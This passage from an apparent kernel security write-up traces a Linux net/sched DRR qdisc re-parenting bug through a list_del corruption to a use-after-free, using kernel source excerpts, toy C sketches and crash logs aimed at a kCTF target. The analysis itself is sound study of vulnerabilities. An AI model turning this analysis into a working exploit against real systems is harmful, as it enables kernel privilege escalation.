<p>Each node in the list points to its neighbors. Node <code class="language-plaintext highlighter-rouge">D</code>, for instance, has node <code class="language-plaintext highlighter-rouge">C</code> in its <code class="language-plaintext highlighter-rouge">prev</code> field and node <code class="language-plaintext highlighter-rouge">A</code> in its <code class="language-plaintext highlighter-rouge">next</code> field, because the list is circular. The validity check makes sure that if you want to delete node <code class="language-plaintext highlighter-rouge">D</code>, node <code class="language-plaintext highlighter-rouge">C</code> says its next node is <code class="language-plaintext highlighter-rouge">D</code> and node <code class="language-plaintext highlighter-rouge">A</code> says its previous node is <code class="language-plaintext highlighter-rouge">D</code>. Makes sense. But in our <code class="language-plaintext highlighter-rouge">list_del</code> <code class="language-plaintext highlighter-rouge">WARN()</code> banner we see that this function returns false because <code class="language-plaintext highlighter-rouge">list_del corruption, ffff8fdd50a008d0-&gt;next is NULL</code>. So we can’t even check the neighboring nodes for sanity, because the node we are trying to delete doesn’t have a <code class="language-plaintext highlighter-rouge">next</code> value at all; it’s <code class="language-plaintext highlighter-rouge">NULL</code>.</p>
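
<p>Here is a small userspace sketch of that check, assuming a simplified stand-in for the kernel’s list API. The <code class="language-plaintext highlighter-rouge">toy_</code> names are hypothetical and the poison-value checks are left out. It shows the two cases that matter here: a node that was properly linked passes the check, while a node that was zeroed and never linked fails at the very first test, before its neighbors are ever inspected.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdbool.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

/* Userspace stand-in for the kernel's struct list_head. */
struct toy_list_head {
	struct toy_list_head *next, *prev;
};

/* An empty circular list is a head that points at itself. */
static void toy_list_init(struct toy_list_head *head)
{
	head-&gt;next = head;
	head-&gt;prev = head;
}

static void toy_list_add_tail(struct toy_list_head *node, struct toy_list_head *head)
{
	node-&gt;prev = head-&gt;prev;
	node-&gt;next = head;
	head-&gt;prev-&gt;next = node;
	head-&gt;prev = node;
}

/* Simplified debug check: NULL pointers first, then both neighbors. */
static bool toy_list_del_entry_valid(const struct toy_list_head *entry)
{
	if (entry-&gt;next == NULL) {
		printf("list_del corruption, %p-&gt;next is NULL\n", (const void *)entry);
		return false;
	}
	if (entry-&gt;prev == NULL) {
		printf("list_del corruption, %p-&gt;prev is NULL\n", (const void *)entry);
		return false;
	}
	if (entry-&gt;prev-&gt;next != entry || entry-&gt;next-&gt;prev != entry) {
		printf("list_del corruption, neighbors do not point back at %p\n",
		       (const void *)entry);
		return false;
	}
	return true;
}

/* Unlinks entry only when the check passes; returns whether it was unlinked. */
static bool toy_list_del(struct toy_list_head *entry)
{
	if (!toy_list_del_entry_valid(entry))
		return false;

	entry-&gt;prev-&gt;next = entry-&gt;next;
	entry-&gt;next-&gt;prev = entry-&gt;prev;
	return true;
}
</code></pre></div></div>
<p>If you <code class="language-plaintext highlighter-rouge">memset</code> a <code class="language-plaintext highlighter-rouge">struct toy_list_head</code> to zero and pass it straight to <code class="language-plaintext highlighter-rouge">toy_list_del</code>, the function refuses to unlink it and prints the same style of “next is NULL” message as the splat above.</p>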

<p>OK, so we fail this <code class="language-plaintext highlighter-rouge">list_del</code> and the PoC just dies here, because when we delete class 1:3 the <code class="language-plaintext highlighter-rouge">list_head</code> that we submit for deletion at some point in the <code class="language-plaintext highlighter-rouge">/net/sched</code> code is either corrupted or was never initialized. So let’s now figure out what is going on in <code class="language-plaintext highlighter-rouge">/net/sched</code> when this bug occurs.</p>

<h2 id="sched-bug-analysis">Sched Bug Analysis</h2>
<p>Taking a deeper dive into the <code class="language-plaintext highlighter-rouge">/net/sched</code> code, it became clear why the node that we were deleting was in a buggy state. In the PoC we create a class 1:1 and assign it a qdisc of type <code class="language-plaintext highlighter-rouge">plug</code>. A <code class="language-plaintext highlighter-rouge">plug</code> qdisc is meant to literally stop packets from being dequeued until it’s given an explicit release command or deleted; it plugs up the <code class="language-plaintext highlighter-rouge">qdisc</code> with packets as they are “enqueued”. So if we send a packet to class 1:1, that packet will be enqueued in 1:1’s qdisc, which is a plug type, meaning those packets will sit there until we explicitly ask for them. So at this point, it’s clear that for some reason, making sure packets are held in the plug qdisc is crucial to the PoC. But what about our buggy <code class="language-plaintext highlighter-rouge">list_head</code> node? After we send a packet to class 1:1 and the plug qdisc, we send a packet to 1:3. Class 1:3 is the class that we grafted the already existing pfifo qdisc onto from 3:1 when we exercised the re-parenting bug. Let’s take a look at what happens when we send a packet to a class, namely class 1:3:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">drr_enqueue</span><span class="p">(</span><span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span><span class="p">,</span> <span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span>
		       <span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">**</span><span class="n">to_free</span><span class="p">)</span>
<span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">len</span> <span class="o">=</span> <span class="n">qdisc_pkt_len</span><span class="p">(</span><span class="n">skb</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="n">bool</span> <span class="n">first</span><span class="p">;</span>

	<span class="n">cl</span> <span class="o">=</span> <span class="n">drr_classify</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">sch</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">err</span><span class="p">);</span>		<span class="c1">// [1]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">cl</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">err</span> <span class="o">&amp;</span> <span class="n">__NET_XMIT_BYPASS</span><span class="p">)</span>
			<span class="n">qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="n">__qdisc_drop</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">to_free</span><span class="p">);</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">first</span> <span class="o">=</span> <span class="o">!</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="p">;</span>			<span class="c1">// [2]</span>
	<span class="n">err</span> <span class="o">=</span> <span class="n">qdisc_enqueue</span><span class="p">(</span><span class="n">skb</span><span class="p">,</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">,</span> <span class="n">to_free</span><span class="p">);</span>	<span class="c1">// [3]</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="n">err</span> <span class="o">!=</span> <span class="n">NET_XMIT_SUCCESS</span><span class="p">))</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">net_xmit_drop_count</span><span class="p">(</span><span class="n">err</span><span class="p">))</span> <span class="p">{</span>
			<span class="n">cl</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">drops</span><span class="o">++</span><span class="p">;</span>
			<span class="n">qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
		<span class="p">}</span>
		<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">first</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">list_add_tail</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">active</span><span class="p">);</span>	<span class="c1">// [4]</span>
		<span class="n">cl</span><span class="o">-&gt;</span><span class="n">deficit</span> <span class="o">=</span> <span class="n">cl</span><span class="o">-&gt;</span><span class="n">quantum</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="n">sch</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">backlog</span> <span class="o">+=</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span><span class="o">++</span><span class="p">;</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>There are a few important things going on here. I haven’t yet mentioned the <code class="language-plaintext highlighter-rouge">drr</code> aspect of this, which stands for “Deficit Round Robin”, the algorithm used to determine how packet delivery is scheduled in this PoC. The details of the DRR algorithm are not super important, but from what I have learned, at a high level it keeps track of which classes are currently “active”, i.e., have packets enqueued to them, and tries to deliver packets based on “deficits” that are configurable. This way packets are distributed in a way that makes sense to us as an end-user trying to shape traffic or guarantee some quality of service. This function is invoked when the qdisc we set up in step 1 has been enqueued with a packet (at the interface level, we use loopback):</p>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: In this step we have a packet, and we attempt to classify the packet into one of the existing <code class="language-plaintext highlighter-rouge">drr</code> classes that belong in the root qdisc hierarchy with the <code class="language-plaintext highlighter-rouge">drr_classify</code> function</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: If we find a class that matches the packet, i.e., the priority matches a class we have set up like 1:3, we check class 1:3’s qdisc to see whether it already has any packets enqueued; if it does not, the <code class="language-plaintext highlighter-rouge">first</code> flag is set to true</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: Class 1:3’s qdisc is enqueued with a packet</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[4]</code>: If this was the class’s first packet, the class needs to be placed on the <code class="language-plaintext highlighter-rouge">drr</code> scheduler’s <code class="language-plaintext highlighter-rouge">active</code> list, which links together the <code class="language-plaintext highlighter-rouge">list_head</code> (<code class="language-plaintext highlighter-rouge">cl-&gt;alist</code>) of every <code class="language-plaintext highlighter-rouge">drr</code> class that has packets enqueued, so that the scheduler can apply the algorithm and make sure packets are dequeued appropriately</p>
  </li>
</ul>
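
<p>The steps above boil down to a small state transition, sketched here in userspace C. The <code class="language-plaintext highlighter-rouge">toy_</code> types are hypothetical, classification (step 1) and error handling are omitted, and a boolean stands in for <code class="language-plaintext highlighter-rouge">cl-&gt;alist</code> being linked into the scheduler’s <code class="language-plaintext highlighter-rouge">active</code> list. The point is that a class is only activated on the enqueue that takes its child qdisc from empty to non-empty.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdbool.h&gt;

/* Hypothetical stand-in for the child qdisc attached to a class. */
struct toy_child_qdisc {
	unsigned int qlen;	/* packets currently queued */
};

/* Hypothetical stand-in for struct drr_class. */
struct toy_drr_class {
	struct toy_child_qdisc *qdisc;
	bool on_active_list;	/* models cl-&gt;alist being on q-&gt;active */
	int deficit;
	int quantum;
};

/* Returns true if this enqueue activated the class. */
static bool toy_drr_enqueue(struct toy_drr_class *cl)
{
	bool first = !cl-&gt;qdisc-&gt;qlen;	/* [2] sampled before the enqueue */

	cl-&gt;qdisc-&gt;qlen++;		/* [3] child qdisc accepts the packet */

	if (first) {			/* [4] the class joins the active list */
		cl-&gt;on_active_list = true;
		cl-&gt;deficit = cl-&gt;quantum;
	}
	return first;
}
</code></pre></div></div>
<p>Calling <code class="language-plaintext highlighter-rouge">toy_drr_enqueue</code> twice on a class whose child qdisc starts empty returns true the first time and false the second, since the second packet arrives at a class that is already active.</p>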

<p>Everything in here makes sense and after printing out the class and qdisc pointer values and lining them up with allocations from the PoC when we set up the hierarchy, nothing seemed amiss here. Let’s look at the backtrace from when the <code class="language-plaintext highlighter-rouge">list_del</code> <code class="language-plaintext highlighter-rouge">WARN()</code> occurs to see what function that occurred in:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
</span></code></pre></div></div>

<p>So we land in <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code> from a call to <code class="language-plaintext highlighter-rouge">drr_delete_class</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">int</span> <span class="nf">drr_delete_class</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">,</span>
			    <span class="k">struct</span> <span class="n">netlink_ext_ack</span> <span class="o">*</span><span class="n">extack</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_sched</span> <span class="o">*</span><span class="n">q</span> <span class="o">=</span> <span class="n">qdisc_priv</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">filter_cnt</span> <span class="o">&gt;</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EBUSY</span><span class="p">;</span>

	<span class="n">sch_tree_lock</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>

	<span class="n">qdisc_purge_queue</span><span class="p">(</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">qdisc</span><span class="p">);</span>				<span class="c1">// [1]</span>
	<span class="n">qdisc_class_hash_remove</span><span class="p">(</span><span class="o">&amp;</span><span class="n">q</span><span class="o">-&gt;</span><span class="n">clhash</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">common</span><span class="p">);</span>	<span class="c1">// [2]</span>

	<span class="n">sch_tree_unlock</span><span class="p">(</span><span class="n">sch</span><span class="p">);</span>

	<span class="n">drr_destroy_class</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">cl</span><span class="p">);</span>
	<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: In this step we purge the class’s qdisc, which in our case would be our buggy qdisc that we re-parented to 1:3 from 3:1</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: Remove this class from the scheduler’s class hash table so that it cannot be looked up again</p>
  </li>
</ul>

<p>The source doesn’t quite match the backtrace, probably because of inlining, but we end up in <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code> from <code class="language-plaintext highlighter-rouge">qdisc_purge_queue</code> calling <code class="language-plaintext highlighter-rouge">qdisc_tree_reduce_backlog</code> as part of the qdisc cleanup process. This is where our buggy state reveals itself:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">qdisc_tree_reduce_backlog</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">sch</span><span class="p">,</span> <span class="kt">int</span> <span class="n">n</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
	<span class="n">bool</span> <span class="n">qdisc_is_offloaded</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">TCQ_F_OFFLOADED</span><span class="p">;</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">Qdisc_class_ops</span> <span class="o">*</span><span class="n">cops</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">cl</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">parentid</span><span class="p">;</span>
	<span class="n">bool</span> <span class="n">notify</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">drops</span><span class="p">;</span>

	<span class="k">if</span> <span class="p">(</span><span class="n">n</span> <span class="o">==</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
		<span class="k">return</span><span class="p">;</span>
	<span class="n">drops</span> <span class="o">=</span> <span class="n">max_t</span><span class="p">(</span><span class="kt">int</span><span class="p">,</span> <span class="n">n</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="n">rcu_read_lock</span><span class="p">();</span>
	<span class="k">while</span> <span class="p">((</span><span class="n">parentid</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">parent</span><span class="p">))</span> <span class="p">{</span>				<span class="c1">// [1]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">parentid</span> <span class="o">==</span> <span class="n">TC_H_ROOT</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>

		<span class="k">if</span> <span class="p">(</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">TCQ_F_NOPARENT</span><span class="p">)</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="cm">/* Notify parent qdisc only if child qdisc becomes empty.
		 *
		 * If child was empty even before update then backlog
		 * counter is screwed and we skip notification because
		 * parent class is already passive.
		 *
		 * If the original child was offloaded then it is allowed
		 * to be seem as empty, so the parent is notified anyway.
		 */</span>
		<span class="n">notify</span> <span class="o">=</span> <span class="o">!</span><span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">&amp;&amp;</span> <span class="o">!</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="o">!</span><span class="n">n</span> <span class="o">&amp;&amp;</span>
						       <span class="o">!</span><span class="n">qdisc_is_offloaded</span><span class="p">);</span>
		<span class="cm">/* TODO: perform the search on a per txq basis */</span>
		<span class="n">sch</span> <span class="o">=</span> <span class="n">qdisc_lookup</span><span class="p">(</span><span class="n">qdisc_dev</span><span class="p">(</span><span class="n">sch</span><span class="p">),</span> <span class="n">TC_H_MAJ</span><span class="p">(</span><span class="n">parentid</span><span class="p">));</span> 
		<span class="k">if</span> <span class="p">(</span><span class="n">sch</span> <span class="o">==</span> <span class="nb">NULL</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">parentid</span> <span class="o">!=</span> <span class="n">TC_H_ROOT</span><span class="p">);</span>
			<span class="k">break</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">cops</span> <span class="o">=</span> <span class="n">sch</span><span class="o">-&gt;</span><span class="n">ops</span><span class="o">-&gt;</span><span class="n">cl_ops</span><span class="p">;</span>				<span class="c1">// [2]</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">notify</span> <span class="o">&amp;&amp;</span> <span class="n">cops</span><span class="o">-&gt;</span><span class="n">qlen_notify</span><span class="p">)</span> <span class="p">{</span>
			<span class="n">cl</span> <span class="o">=</span> <span class="n">cops</span><span class="o">-&gt;</span><span class="n">find</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">parentid</span><span class="p">);</span>			<span class="c1">// [3]</span>
			<span class="n">cops</span><span class="o">-&gt;</span><span class="n">qlen_notify</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">cl</span><span class="p">);</span>			<span class="c1">// [4]</span>
		<span class="p">}</span>
		<span class="n">sch</span><span class="o">-&gt;</span><span class="n">q</span><span class="p">.</span><span class="n">qlen</span> <span class="o">-=</span> <span class="n">n</span><span class="p">;</span>
		<span class="n">sch</span><span class="o">-&gt;</span><span class="n">qstats</span><span class="p">.</span><span class="n">backlog</span> <span class="o">-=</span> <span class="n">len</span><span class="p">;</span>
		<span class="n">__qdisc_qstats_drop</span><span class="p">(</span><span class="n">sch</span><span class="p">,</span> <span class="n">drops</span><span class="p">);</span>
	<span class="p">}</span>
	<span class="n">rcu_read_unlock</span><span class="p">();</span>
<span class="p">}</span>
</code></pre></div></div>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[1]</code>: We use the parentid that is derived from the qdisc. This is where the problem is: remember that one of the effects of the bug was that the qdisc itself doesn’t know that it was reparented to 1:3, so its parentid still references class 3:1</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[2]</code>: Grab a reference to the class ops function table (<code class="language-plaintext highlighter-rouge">cl_ops</code>) of the parent qdisc we just looked up, so that we do a search appropriate for that qdisc type, i.e. <code class="language-plaintext highlighter-rouge">drr</code></p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[3]</code>: Use the class ops to execute the <code class="language-plaintext highlighter-rouge">find</code> function, which for <code class="language-plaintext highlighter-rouge">drr</code> is <code class="language-plaintext highlighter-rouge">drr_search_class</code>. This sets <code class="language-plaintext highlighter-rouge">cl</code> to class 3:1 because, according to the buggy qdisc, that is still its parent class</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">[4]</code>: We call the class ops <code class="language-plaintext highlighter-rouge">qlen_notify</code> function, which for <code class="language-plaintext highlighter-rouge">drr</code> is <code class="language-plaintext highlighter-rouge">drr_qlen_notify</code></p>
  </li>
</ul>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">void</span> <span class="nf">drr_qlen_notify</span><span class="p">(</span><span class="k">struct</span> <span class="n">Qdisc</span> <span class="o">*</span><span class="n">csh</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="n">cl</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">drr_class</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>

	<span class="n">list_del</span><span class="p">(</span><span class="o">&amp;</span><span class="n">cl</span><span class="o">-&gt;</span><span class="n">alist</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>And here is the problem! We call <code class="language-plaintext highlighter-rouge">list_del</code> on class 3:1’s <code class="language-plaintext highlighter-rouge">alist</code> member, which is an uninitialized (NULL) <code class="language-plaintext highlighter-rouge">list_head</code>. It is uninitialized because class 3:1 was never placed on the drr scheduler’s active list: when we enqueued packets into class 1:3, it was class 1:3’s <code class="language-plaintext highlighter-rouge">alist</code> that was initialized and inserted into the scheduler’s active class list. This explains why we get the splat.</p>
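<p>To make the failure mode concrete, here is a minimal userspace sketch of the situation. It is not the kernel’s code: <code class="language-plaintext highlighter-rouge">list_del_entry_valid</code>, <code class="language-plaintext highlighter-rouge">checked_list_del</code>, and <code class="language-plaintext highlighter-rouge">demo_delete_wrong_class</code> are hypothetical names, and the checks are a simplified stand-in for what <code class="language-plaintext highlighter-rouge">__list_del_entry_valid_or_report</code> does. It assumes the never-activated class has a zeroed <code class="language-plaintext highlighter-rouge">list_head</code>, as described above.</p>

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

/* Userspace stand-in for the kernel's struct list_head. */
struct list_head {
	struct list_head *next, *prev;
};

static void list_init(struct list_head *h)
{
	h->next = h;
	h->prev = h;
}

static void list_add_tail(struct list_head *n, struct list_head *head)
{
	n->prev = head->prev;
	n->next = head;
	head->prev->next = n;
	head->prev = n;
}

/* Simplified sanity checks: reject NULL links and links whose
 * neighbours do not point back at the entry. */
static bool list_del_entry_valid(const struct list_head *e)
{
	if (e->next == NULL || e->prev == NULL)
		return false;
	if (e->prev->next != e || e->next->prev != e)
		return false;
	return true;
}

/* Returns true if the entry was unlinked, false if the checks refused. */
static bool checked_list_del(struct list_head *e)
{
	if (!list_del_entry_valid(e))
		return false;
	e->next->prev = e->prev;
	e->prev->next = e->next;
	e->next = e->prev = NULL;
	return true;
}

/* Hypothetical scenario: class 1:3 was activated, class 3:1 never was. */
static bool demo_delete_wrong_class(void)
{
	struct list_head active;
	struct list_head alist_1_3;
	struct list_head alist_3_1 = { NULL, NULL }; /* never put on a list */

	list_init(&active);
	list_add_tail(&alist_1_3, &active);

	/* The stale parent id makes us unlink 3:1 instead of 1:3. */
	bool unlinked = checked_list_del(&alist_3_1);

	/* Class 1:3 is still linked into the active list. */
	assert(active.next == &alist_1_3);
	return unlinked;
}
```

<p>Calling <code class="language-plaintext highlighter-rouge">demo_delete_wrong_class()</code> reports that nothing was unlinked, while the entry that should have been removed is still on the list.</p>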

<p>That’s one mystery solved, but why does our PoC stop on a <code class="language-plaintext highlighter-rouge">list_del</code> bug when deleting class 1:3, while the patch mentions a UAF and includes deleting class 1:1?</p>

<h2 id="shooting-myself-in-the-foot">Shooting Myself in the Foot</h2>
<p>At this point I was happy to have discovered why we were encountering the list bug, but still didn’t see how this bug was exploitable or could lead to UAF. I started to suspect that the PoC in the patch was just meant to prove there was in fact an issue and not to directly expose a UAF. This was a horrible assumption that led me very astray. For probably two days’ worth of effort, I read all of the code over and over looking for ways that I could get a UAF on the buggy qdisc object. I don’t know why I assumed that the UAF must be on the buggy qdisc, but the fact that it appeared to belong to two separate classes weighed heavily on my mind. The issue I kept coming back to was: the qdisc’s refcount is correct, it’s 2, so how could it be the UAF object? I tried to find ways that I could free the qdisc but still retain a reference to it via class 1:3 or class 3:1, in hopes that that would be the way to access the UAF.</p>

<p>After a couple of days of trying lots of different strategies and thinking about it, I realized that there was no way to free the qdisc from this buggy condition. If you delete its real parent in 3:1, you have no way to grab a handle to it again, because non-root qdiscs must have a classid. So you can’t even look up the qdisc without providing a classid. If you delete 1:3, it will remove a refcount from the qdisc, but now everything is normal: it has a refcount of 1 and belongs to class 3:1.</p>

<p>I was very frustrated at this point and decided to start over; maybe I had missed something in the patch. I fixated on the fact that in the patch they specifically say “lets trigger the UAF” and the action includes deleting 1:1. To this point, I was never able to even delete 1:1 because I got stuck panicking on the list bug. After toying with the idea of first initializing 3:1’s <code class="language-plaintext highlighter-rouge">alist</code> appropriately and getting it added to the active list for the scheduler to bypass the list bug, I decided to just quickly make sure there was nothing wrong with my setup. Mind you, I’d been working in this environment for 2-3 days at this point getting familiar with the bug, reading the code, debugging, brainstorming about ways to get a UAF on the qdisc, etc.</p>

<p>I revisited the list code we discussed above. There were those <code class="language-plaintext highlighter-rouge">CHECK_DATA_CORRUPTION</code> invocations in the <code class="language-plaintext highlighter-rouge">__list_del_entry_valid_or_report</code> function like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define CHECK_DATA_CORRUPTION(condition, addr, fmt, ...)		 \
	check_data_corruption(({					 \
		bool corruption = unlikely(condition);			 \
		if (corruption) {					 \
			if (addr)					 \
				mem_dump_obj(addr);			 \
			if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
				pr_err(fmt, ##__VA_ARGS__);		 \
				BUG();					 \
			} else						 \
				WARN(1, fmt, ##__VA_ARGS__);		 \
		}							 \
		corruption;						 \
	}))
</span>
<span class="cp">#endif	</span><span class="cm">/* _LINUX_BUG_H */</span><span class="cp">
</span></code></pre></div></div>

<p>Welp, this is a pretty important discovery. It looks like if you have <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION</code> enabled, you will <code class="language-plaintext highlighter-rouge">BUG()</code> on an invalid list del operation, and if you don’t have it enabled, you will simply receive a <code class="language-plaintext highlighter-rouge">WARN()</code>. I checked the kernel config in my development environment and sure enough I had <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION=y</code>. Let’s check the kCTF kernel configuration: <code class="language-plaintext highlighter-rouge">CONFIG_BUG_ON_DATA_CORRUPTION is not set</code>. Yikes! The whole reason I had been stuck on the list delete operation for days was that I had the wrong kernel configuration. I felt awful about this, but going forward I’ll obviously make my environment more kCTF-like from the beginning.</p>

<h2 id="finally-a-uaf-to-investigate">Finally a UAF to Investigate</h2>
<p>Once I had the right kernel configuration, I re-ran the PoC and behold:</p>
<div class="language-terminal highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">[   26.091921] ==================================================================
[   26.093519] BUG: KASAN: slab-use-after-free in __list_del_entry_valid+0x7a/0x140
[   26.095252] Read of size 8 at addr ffff8880134c0558 by task tc.bin/816
[   26.096631] 
</span><span class="gp">[   26.097090] CPU: 0 PID: 816 Comm: tc.bin Tainted: G        W          6.5.13 #</span>92
<span class="go">[   26.098817] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[   26.100720] Call Trace:
</span><span class="gp">[   26.101297]  &lt;TASK&gt;</span><span class="w">
</span><span class="go">[   26.101771]  dump_stack_lvl+0x48/0x60
[   26.102612]  print_report+0xc2/0x600
